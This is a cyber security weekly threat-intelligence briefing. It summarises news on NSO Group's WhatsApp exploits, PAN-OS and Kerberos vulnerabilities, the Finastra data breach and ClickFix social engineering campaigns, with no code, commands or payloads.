Hybrid Cloud
Cyber Security & NaaS
AI & Data
IoT & Connectivity
Business Applications
Intelligent Workplace
Consulting & Professional Services
Small Medium Enterprise
Health and Social Care
Industry
Retail
Tourism and Leisure
Transport & Logistics
Energy & Utilities
Cyber Security Weekly Briefing, 16 - 22 November
NSO Group developed exploits to install Pegasus via WhatsApp
NSO Group used several 0-day exploits that exploited vulnerabilities in WhatsApp to deploy Pegasus spyware in zero-click attacks. According to court documentation, NSO developed the Heaven exploit in 2018 by spoofing the app's official installer to deploy Pegasus. In 2019, it developed another exploit, Eden, to bypass protections implemented in 2018. WhatsApp patched both and disabled NSO accounts.
The latest exploit developed by the company, Erised, used WhatsApp's relay servers to install Pegasus. The installation process would be initiated when an NSO customer would enter a target's cell phone number into a program running on their computer, triggering the remote installation of Pegasus on the targets' devices, targeting the European government sector.
Fixed 0-day fixes in PAN-OS firewalls under active exploitation
Palo Alto has fixed two 0-day vulnerabilities in its NGFW firewalls. The first, identified as CVE-2024-0012, CVSSv4 9.3 according to the vendor, is an authentication bypass flaw that allows attackers to gain administrative privileges. The second, tracked as CVE-2024-9474, CVSSv4 6.9 according to Palo Alto, is a bug that allows privilege escalation to root. Both affect PAN-OS 10.2, 11.0, 11.1 and 11.2, while Cloud NGFW and Prisma Access are not compromised.
Attacks exploiting these flaws have exploited management interfaces exposed to untrusted networks, with activities such as command execution and webshell deployment. Palo Alto Networks recommends patching, restricting access to trusted internal IP addresses, following security best practices and reviewing indicators of compromise.
Finastra, supplier to 45 of the world's 50 largest banks, acknowledges incident
As reported by security researcher Brian Krebs, Finastra, a financial software provider with more than 8,000 customers in 130 countries, including 45 of the world's 50 largest banking institutions, has sent a statement to its customers reporting unauthorized access to its IBM Aspera-hosted SFTP server, which reportedly resulted in a data exfiltration.
According to the company, the threat actor did not deploy malware or manipulate any client files within the environment. Concurrent with the posting of the statement, on November 8, a BreachForums user under the alias abyss0 offered for sale 400 exfiltrated gigabytes purportedly belonging to the company, which apparently included an undetermined volume of customer data. However, Finastra has indicated that the scope and nature of the data contained in the leaked files remains to be determined.
Critical bug fixed in Microsoft Kerberos
Microsoft has fixed a critical vulnerability in the Microsoft Kerberos host and user identity authentication protocol. The flaw, CVE-2024-43639 and CVSSv3 of 9.8, allows unauthenticated attackers to send spoofed requests to vulnerable systems to gain unauthorized access and execute remote code by exploiting a vulnerability in the cryptographic protocol.
In addition, Censys said that more than 1 million exposed Windows Server instances would be vulnerable, as servers configured with the Kerberos KDC proxy would be affected. Also, more than half of these devices were found with the TCP/443 port open, with 34% of the vulnerable servers found in the United States, and 11% associated with IT provider Armstrong Enterprise Communications. In order to mitigate risks, it is recommended to apply the corresponding updates as soon as possible.
Attacks using ClickFix technique
Researchers at Proofpoint published research reporting on social engineering attack campaigns using the technique known as ClickFix. Specifically, this technique was first observed being used by the malicious actor TA571 earlier this year. However, numerous groups have been implementing it among their attack methodologies.
The technique involves using windows containing fake error messages to trick people into copying, pasting and executing malicious content on their computer. Proofpoint has observed ClickFix campaigns leading to malware such as AsyncRAT, Danabot, DarkGate, Lumma Stealer, NetSupport, among others. It should also be noted that it can occur through websites, documents, HTML attachments, malicious URLs, among others, that have been compromised.
◾ This newsletter is one of the deliverables of our Operational and Strategic Intelligence service. If you are interested in knowing the rest of the Operational and Strategic Intelligence contents included in the service, please contact us →
____
